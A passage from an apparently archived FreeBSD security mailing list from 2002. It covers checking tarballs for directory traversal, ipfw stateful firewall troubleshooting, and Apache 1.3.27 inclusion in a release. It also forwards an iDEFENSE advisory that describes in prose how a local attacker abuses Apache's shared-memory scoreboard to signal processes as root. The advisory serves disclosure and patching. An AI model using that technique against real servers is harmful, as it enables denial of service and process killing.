Oct 2002 18:55:32 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from keramida@localhost) by hades.hell.gr (8.12.6/8.12.6/Submit) id g92FtQD4001814; Wed, 2 Oct 2002 18:55:26 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Wed, 2 Oct 2002 18:55:26 +0300 From: Giorgos Keramidas To: "f.johan.beisser" Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Message-ID: <20021002155526.GA1669@hades.hell.gr> References: <4.3.2.7.2.20021001162821.036c0530@localhost> <20021001154626.M67581-100000@pogo.caustic.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20021001154626.M67581-100000@pogo.caustic.org> X-PGP-Fingerprint: C1EB 0653 DB8B A557 3829 00F9 D60F 941A 3186 03B6 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2002-10-01 15:56, "f.johan.beisser" wrote: > On Tue, 1 Oct 2002, Brett Glass wrote: > > Also, even if one does list the contents of a large archive (say, > > a complete distribution of Apache), you'd need to list it slowly > > and read it critically. Even a really long file name will scroll > > by FAST during a listing and could be missed. > > "tar tvf | [more || less]" doesn't seem that hard to me. A quick way of checking existing tarballs for upwards directory traversal is also: $ tar tvf tarball.tar | fgrep '..' $ This shouldn't print anything. If it does, be very cautious about untarring `tarball.tar'. Agreed, this isn't a "fix". But at least you can find out about nasty things before they have any chance to happen and become nastier. Giorgos. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 10:29:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A67FC37B404 for ; Wed, 2 Oct 2002 10:29:08 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id EBE2D43E65 for ; Wed, 2 Oct 2002 10:29:05 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.6/8.12.6) with ESMTP id g92HR4mO027573; Wed, 2 Oct 2002 20:27:05 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.6/8.12.6/Submit) id g92HR4lk027572; Wed, 2 Oct 2002 20:27:04 +0300 (EEST) Date: Wed, 2 Oct 2002 20:27:04 +0300 From: Alexandr Kovalenko To: Giorgos Keramidas Cc: "f.johan.beisser" , Brett Glass , security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Message-ID: <20021002172704.GA27421@nevermind.kiev.ua> References: <4.3.2.7.2.20021001162821.036c0530@localhost> <20021001154626.M67581-100000@pogo.caustic.org> <20021002155526.GA1669@hades.hell.gr> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <20021002155526.GA1669@hades.hell.gr> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Giorgos Keramidas! On Wed, Oct 02, 2002 at 06:55:26PM +0300, you wrote: > > "tar tvf | [more || less]" doesn't seem that hard to me. > A quick way of checking existing tarballs for upwards directory > traversal is also: > > $ tar tvf tarball.tar | fgrep '..' err, this doesn't seem correct to me. I thing that 'file..name' is a correct filename. Yes. It is not commonly used but it could be. -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 12: 1:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B748737B401 for ; Wed, 2 Oct 2002 12:01:12 -0700 (PDT) Received: from fubar.adept.org (fubar.adept.org [63.147.172.249]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4C9BD43E77 for ; Wed, 2 Oct 2002 12:01:12 -0700 (PDT) (envelope-from mike@adept.org) Received: by fubar.adept.org (Postfix, from userid 1001) id E6F67154D5; Wed, 2 Oct 2002 11:58:32 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by fubar.adept.org (Postfix) with ESMTP id E6293154D3; Wed, 2 Oct 2002 11:58:32 -0700 (PDT) Date: Wed, 2 Oct 2002 11:58:32 -0700 (PDT) From: Mike Hoskins To: Brian Behlendorf Cc: Klaus Steden , Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <20021001183010.E58068-100000@yez.hyperreal.org> Message-ID: <20021002115522.S71488-100000@fubar.adept.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brian Behlendorf wrote: > Oh, that would be a pain, wouldn't it? > Like someone said, POLA. In all fairness, taking action that could potentially allow malicious manipulation of filesystems probably isn't very POLA. ;) Really though, I don't see what all the fuss is about. Someone's said we'll have an RC3. I don't understand the huge rush to get new releases out the door (don't in my own company either). It'll be released when it's ready, that's why it's called a 'release'. If we need one more, or ten more RCs... I don't care. It means things are getting fixed while we're waiting. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 3 1:37:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7B70337B401 for ; Thu, 3 Oct 2002 01:37:08 -0700 (PDT) Received: from mail.geek.sh (decoder.geek.sh [196.36.198.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5F54543E3B for ; Thu, 3 Oct 2002 01:37:06 -0700 (PDT) (envelope-from aragon@geek.sh) Received: by mail.geek.sh (Postfix, from userid 1000) id 3D0C124EE2; Thu, 3 Oct 2002 10:07:25 +0200 (SAST) Date: Thu, 3 Oct 2002 10:07:25 +0200 From: Aragon Gouveia To: freebsd-security@freebsd.org Subject: ipfw failing to "check-state" Message-ID: <20021003080725.GF46789@phat.za.net> Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 4.6-RC i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I've recently installed 4.7-RC from sources. I'm having difficulty getting dynamic rules working with ipfw. Here is the output from 'ipfw -d show' : 00100 0 0 check-state 01000 574 354032 allow tcp from any to 66.8.x.y 25 keep-state setup 65535 11589448 7623002626 allow ip from any to any ## Dynamic rules: 01000 397 312298 (T 299, slot 77) <-> tcp, 66.8.x.y 32145<-> 66.8.x.y 25 01000 13 572 (T 297, slot 97) <-> tcp, 196.26.x.y 1781<-> 66.8.x.y 25 01000 5 216 (T 297, slot 187) <-> tcp, 196.36.x.y 1525<-> 66.8.x.y 25 01000 21 1566 (T 299, slot 196) <-> tcp, 66.8.x.y 3794<-> 66.8.x.y 25 As can be seen above, no traffic is matching rule 100 as it should. If it weren't for my default allow rule, smtp connections would not work to the machine specified in rule 1000. I'm using IPFW1, not IPFW2. I posted to questions@ yesterday but have received no response so far. This looks very much like an ipfw bug but I wanted to confirm it here before PR'ing. Has anyone else experienced this? Thanks, Aragon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 3 2: 5:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A7F3137B401 for ; Thu, 3 Oct 2002 02:05:31 -0700 (PDT) Received: from www.wsf.at (MAIL.WSF.AT [212.16.37.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 37E3C43E42 for ; Thu, 3 Oct 2002 02:05:30 -0700 (PDT) (envelope-from net@wsf.at) Received: (from root@localhost) by www.wsf.at (8.11.6/8.9.3) id g9395SL99886 for freebsd-security@FreeBSD.ORG.KAV; Thu, 3 Oct 2002 11:05:28 +0200 (CEST) (envelope-from net@wsf.at) Received: from wsf.at (localhost [127.0.0.1]) by www.wsf.at (8.11.6/8.9.3) with SMTP id g9395RY99870; Thu, 3 Oct 2002 11:05:27 +0200 (CEST) (envelope-from net@wsf.at) Message-Id: <200210030905.g9395RY99870@www.wsf.at> Date: Thu, 3 Oct 2002 09:05:27 -0000 To: "Aragon Gouveia" , Subject: Re: ipfw failing to "check-state" From: "Thomas Wolf" X-Mailer: TWIG 2.6.2 In-Reply-To: <20021003080725.GF46789@phat.za.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Aragon Gouveia schrieb: > Hi, > > I've recently installed 4.7-RC from sources. I'm having difficulty getting > dynamic rules working with ipfw. Here is the output from 'ipfw -d show' : > > 00100 0 0 check-state > 01000 574 354032 allow tcp from any to 66.8.x.y 25 keep-state setup > 65535 11589448 7623002626 allow ip from any to any > ## Dynamic rules: > 01000 397 312298 (T 299, slot 77) <-> tcp, 66.8.x.y 32145<-> 66.8.x.y 25 > 01000 13 572 (T 297, slot 97) <-> tcp, 196.26.x.y 1781<-> 66.8.x.y 25 > 01000 5 216 (T 297, slot 187) <-> tcp, 196.36.x.y 1525<-> 66.8.x.y 25 > 01000 21 1566 (T 299, slot 196) <-> tcp, 66.8.x.y 3794<-> 66.8.x.y 25 > > > As can be seen above, no traffic is matching rule 100 as it should. If it > weren't for my default allow rule, smtp connections would not work to the > machine specified in rule 1000. > > I'm using IPFW1, not IPFW2. I posted to questions@ yesterday but have > received no response so far. This looks very much like an ipfw bug but I > wanted to confirm it here before PR'ing. Has anyone else experienced this? > > > Thanks, > Aragon Hi, Are you sure the traffic from 66.8.x.y 25 would be blocked without your default rule ? Regarding the counter on rule 100, AFAIR ipfw did(does) never increment on the check-state rule but on the 'parent' rule). From your example, everything looks just fine and the temporary rules seem to be ok. Try adding 1001 count tcp from 66.8.x.y 25 to any I am sure you will never see traffic at this point. regards Thomas P.S.: I just tried: 00001 check-state 00002 allow tcp from any to 212.16.37.103 25 keep-state setup 00003 deny ip from any to any via ed0 and it worked just fine. The only difference is that I am running 4.6.2 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 3 2:38:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 36DAE37B401 for ; Thu, 3 Oct 2002 02:38:42 -0700 (PDT) Received: from mail.geek.sh (decoder.geek.sh [196.36.198.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1434143E6A for ; Thu, 3 Oct 2002 02:38:40 -0700 (PDT) (envelope-from aragon@geek.sh) Received: by mail.geek.sh (Postfix, from userid 1000) id C071824EF9; Thu, 3 Oct 2002 11:38:35 +0200 (SAST) Date: Thu, 3 Oct 2002 11:38:35 +0200 From: Aragon Gouveia To: freebsd-security@FreeBSD.ORG Subject: Re: ipfw failing to "check-state" Message-ID: <20021003093835.GG46789@phat.za.net> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20021003080725.GF46789@phat.za.net> <200210030905.g9395RY99870@www.wsf.at> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200210030905.g9395RY99870@www.wsf.at> User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 4.6-RC i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | By Thomas Wolf | [ 2002-10-03 11:05 +0200 ] > Are you sure the traffic from 66.8.x.y 25 would be blocked without > your default rule ? Regarding the counter on rule 100, > AFAIR ipfw did(does) never increment on the check-state rule but > on the 'parent' rule). From your example, everything looks just fine > and the temporary rules seem to be ok. Try adding > 1001 count tcp from 66.8.x.y 25 to any > I am sure you will never see traffic at this point. I think you're right. I added the count rule after the keep-state rule and the counters didn't increment. I can't check with a deny just yet, but in theory traffic shouldn't be blocked. I must have been doing something braindead yesterday that caused connections to be blocked. I assumed it was a problem with check-state when the counters weren't incrementing. :) Thanks, Aragon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 3 21:14:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C74B037B401 for ; Thu, 3 Oct 2002 21:14:28 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2DAD243E6A for ; Thu, 3 Oct 2002 21:14:28 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.6/8.12.6) with ESMTP id g944EQvO015156 for ; Fri, 4 Oct 2002 00:14:26 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20021004001325.0397c618@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Fri, 04 Oct 2002 00:15:16 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: Fwd: iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable X-Virus-Scanned: By Sentex Communications (obsidian/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FYI for those of you not on bugtraq. ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >From: "David Endler" >To: bugtraq@securityfocus.com >Date: Thu, 3 Oct 2002 12:47:54 -0400 >Subject: iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory= =20 >scoreboard vulnerabilities >Reply-To: dendler@idefense.com >X-Spam-Status: No, hits=3D-5.1 required=3D5.0 tests=3DPGP_SIGNATURE= version=3D2.11 >X-Virus-Scanned: By Sentex Communications (avscan1/20020517) > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >iDEFENSE Security Advisory 10.03.2002 >Apache 1.3.x shared memory scoreboard vulnerabilities > >16:00 GMT, October 3, 2002 > > >I. BACKGROUND > >The Apache Software Foundation's HTTP Server is an effort to develop >and maintain an open-source HTTP server for modern operating systems >including Unix and Windows NT. The goal of this project is to provide >a secure, efficient and extensible server that provides HTTP services >in sync with the current HTTP standards. More details about it are >available at http://httpd.apache.org . > >II. DESCRIPTION > >Apache HTTP Server contains a vulnerability in its shared memory >scoreboard. Attackers who can execute commands under the Apache UID >can either send a (SIGUSR1) signal to any process as root, in most >cases killing the process, or launch a local denial of service (DoS) >attack. > >III. ANALYSIS > >Exploitation requires execute permission under the Apache UID. This >can be obtained by any local user with a legitimate Apache scripting >resource (ie: PHP, Perl), exploiting a vulnerability in web-based >applications written in the above example languages, or through the >use of some other local/remote Apache exploit. > >Once such a status is attained, the attacker can then attach to the >httpd daemon's 'scoreboard', which is stored in a shared memory >segment owned by Apache. The attacker can then cause a DoS condition >on the system by continuously filling the table with null values and >causing the server to spawn new children. > >The attacker also has the ability to send any process a SIGUSR1 >signal as root. This is accomplished by continuously overwriting the >parent[].pid and parent[].last_rtime segments within the scoreboard >to the pid of the target process and a time in the past. When the >target pid receives the signal SIGUSR1, it will react according to >how it is designed to manage the signal. According to the man page >(man 7 signal), if the signal is un-handled then the default action >is to terminate: > > ... > SIGUSR1 30,10,16 A User-defined signal 1 > ... > The letters in the "Action" column have the following meanings: > > A Default action is to terminate the process. > ... > >iDEFENSE successfully terminated arbitrary processes, including those >that "kicked" people off the system. > >IV. DETECTION > >Apache HTTP Server 1.3.x, running on all applicable Unix platforms, >is affected. > >V. VENDOR FIX/RESPONSE > >Apache HTTP Server 1.3.27 fixes this problem. It should be available >on October 3 at http://www.apache.org/dist/httpd/ . > >VI. CVE INFORMATION > >The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project >has assigned the identification number CAN-2002-0839 to this issue. > >VII. DISCLOSURE TIMELINE > >8/27/2002 Issue disclosed to iDEFENSE >9/18/2002 Vendor notified at security@apache.org >9/18/2002 iDEFENSE clients notified >9/19/2002 Response received from Mark J Cox (mark@awe.com) >10/3/2002 Coordinated public disclosure > >VIII. CREDIT > >zen-parse (zen-parse@gmx.net) disclosed this issue to iDEFENSE. > > >Get paid for security research >http://www.idefense.com/contributor.html > >Subscribe to iDEFENSE Advisories: >send email to listserv@idefense.com, subject line: "subscribe" > > >About iDEFENSE: > >iDEFENSE is a global security intelligence company that proactively >monitors sources throughout the world =97 from technical >vulnerabilities and hacker profiling to the global spread of viruses >and other malicious code. iALERT, our security intelligence service, >provides decision-makers, frontline security professionals and >network administrators with timely access to actionable intelligence >and decision support on cyber-related threats. For more information, >visit http://www.idefense.com. > > >- -dave > >David Endler, CISSP >Director, Technical Intelligence >iDEFENSE, Inc. >14151 Newbrook Drive >Suite 100 >Chantilly, VA 20151 >voice: 703-344-2632 >fax: 703-961-1071 > >dendler@idefense.com >www.idefense.com > >-----BEGIN PGP SIGNATURE----- >Version: PGP 7.1.2 >Comment: http://pgp.mit.edu:11371/pks/lookup?op=3Dget&search=3D0x4B0ACC2A > >iQA/AwUBPZx0I0rdNYRLCswqEQIowQCfQT+FYR1FLTEzlf49SpJXwDnie8wAn3Kr >CncduGV6EYHqVayQE90b7Yij >=3D4T8j >-----END PGP SIGNATURE----- -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 4 7:18:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4683537B401; Fri, 4 Oct 2002 07:18:36 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 998E843E42; Fri, 4 Oct 2002 07:18:35 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.6/8.12.6) with ESMTP id g94EIYvO056011; Fri, 4 Oct 2002 10:18:34 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Fri, 04 Oct 2002 10:19:14 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: still time for apache security fix ? Cc: re@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Will there be time to update 4.7R to include Apache 1.3.27 ? There are a number of security issues fixed in this rev. (see http://httpd.apache.org/) ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 4 8:36: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 16BF237B401 for ; Fri, 4 Oct 2002 08:35:59 -0700 (PDT) Received: from mail.geek.sh (decoder.geek.sh [196.36.198.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DF3943E3B for ; Fri, 4 Oct 2002 08:35:58 -0700 (PDT) (envelope-from aragon@geek.sh) Received: by mail.geek.sh (Postfix, from userid 1000) id 8F1B424EE2; Fri, 4 Oct 2002 17:35:54 +0200 (SAST) Date: Fri, 4 Oct 2002 17:35:54 +0200 From: Aragon Gouveia To: freebsd-security@freebsd.org Subject: ipfw stateful help - strange behaviour Message-ID: <20021004153554.GD5787@phat.za.net> Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 4.6-RC i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I'm having a problem with ipfw's stateful operation which I can't quite figure out. Let me start with my ruleset. 00100 check-state 00500 allow tcp from any to 66.8.x.y 80 keep-state setup 01000 deny tcp from any to 66.8.x.y 80 65535 allow ip from any to any Ok this ruleset works great from all my machines. But I'm noticing a lot of traffic is hitting rule 1000. When enabling logging on rule 1000, I see around 10 hits a minute. I know it could be arbly generated packets directed at 66.8.x.y on port 80, but with this frequency it doesn't look right. So I changed my ruleset slightly to this : 00100 check-state 00500 allow tcp from any to 66.8.x.y 80 keep-state setup 01000 fwd 66.8.b.c,34501 tcp from any to 66.8.x.y 80 65535 allow ip from any to any This allowed me to analyse what was hitting rule 1000 by running tcpdump on 66.8.b.c. Here's the output : 17:06:45.824689 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 213.155.147.226.61175 > 66.8.x.y.80: R 1312082120:1312082120(0) win 0 (DF) 17:06:45.824722 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 213.155.147.226.61175 > 66.8.x.y.80: R 1312082120:1312082120(0) win 0 17:07:42.377830 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23973 > 66.8.x.y.80: . ack 1478932865 win 7300 (DF) 17:07:42.393216 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23853 > 66.8.x.y.80: . ack 1478195413 win 7300 (DF) 17:07:42.393275 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23971 > 66.8.x.y.80: . ack 1478797841 win 7300 (DF) 17:07:42.393343 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24168 > 66.8.x.y.80: . ack 1479411419 win 7300 (DF) 17:07:42.423224 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24170 > 66.8.x.y.80: . ack 1479562687 win 7300 (DF) 17:07:45.421580 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24170 > 66.8.x.y.80: . ack 1 win 7300 (DF) 17:07:45.422375 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23853 > 66.8.x.y.80: . ack 1 win 7300 (DF) 17:07:45.424352 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23971 > 66.8.x.y.80: . ack 1 win 7300 (DF) 17:07:45.511551 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.23973 > 66.8.x.y.80: . ack 1 win 7300 (DF) 17:07:45.511607 0:10:b5:42:7d:69 0:20:ed:34:c9:6c 0800 60: 212.125.65.237.24168 > 66.8.x.y.80: . ack 1 win 7300 (DF) Okay, what gives - no SYN packets. So I checked the state table a few seconds after these packets were forwarded to 66.8.b.c and : 00500 227 135562 (T 252, slot 78) <-> tcp, 213.155.147.226 61162<->66.8.x.y 80 00500 101 33708 (T 254, slot 92) <-> tcp, 213.155.147.226 61176<->66.8.x.y 80 00500 3 132 (T 299, slot 149) <-> tcp, 212.125.65.237 24638<-> 66.8.x.y 80 00500 3 132 (T 299, slot 150) <-> tcp, 212.125.65.237 24637<-> 66.8.x.y 80 So it looks like the connections are matching the 'setup' flag and entering the state table, but they're not being matched by 'check-state' on further communication. Any ideas? I'm using IPFW1 on 4.7-RC. Thanks, Aragon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 4 9:18: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EFB1737B401; Fri, 4 Oct 2002 09:17:58 -0700 (PDT) Received: from obsecurity.dyndns.org (adsl-64-165-226-88.dsl.lsan03.pacbell.net [64.165.226.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8072F43E42; Fri, 4 Oct 2002 09:17:58 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id B4B4066B79; Fri, 4 Oct 2002 09:17:55 -0700 (PDT) Date: Fri, 4 Oct 2002 09:17:55 -0700 From: Kris Kennaway To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG, re@FreeBSD.ORG Subject: Re: still time for apache security fix ? Message-ID: <20021004161755.GB24842@xor.obsecurity.org> References: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="SkvwRMAIpAhPCcCJ" Content-Disposition: inline In-Reply-To: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --SkvwRMAIpAhPCcCJ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Oct 04, 2002 at 10:19:14AM -0400, Mike Tancsa wrote: >=20 > Will there be time to update 4.7R to include Apache 1.3.27 ? There are a= =20 > number of security issues fixed in this rev. (see http://httpd.apache.org= /) Yes. Kris --SkvwRMAIpAhPCcCJ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9nb8yWry0BWjoQKURAuRJAKCNdZjr0KoG/zji+Tvk4+23SpE0rACgvKQK xMhBrTrEPmB3XyFHF9DyTaY= =91M7 -----END PGP SIGNATURE----- --SkvwRMAIpAhPCcCJ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 5 5:48:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ECAF337B401; Sat, 5 Oct 2002 05:48:52 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0230743E42; Sat, 5 Oct 2002 05:48:52 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.6/8.12.6) with ESMTP id g95CmnfV012217; Sat, 5 Oct 2002 08:48:49 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20021005084558.062ddb78@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sat, 05 Oct 2002 08:46:53 -0400 To: Kris Kennaway From: Mike Tancsa Subject: Re: still time for apache security fix ? Cc: freebsd-security@FreeBSD.ORG, re@FreeBSD.ORG In-Reply-To: <20021004161755.GB24842@xor.obsecurity.org> References: <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:17 AM 10/4/2002 -0700, Kris Kennaway wrote: >On Fri, 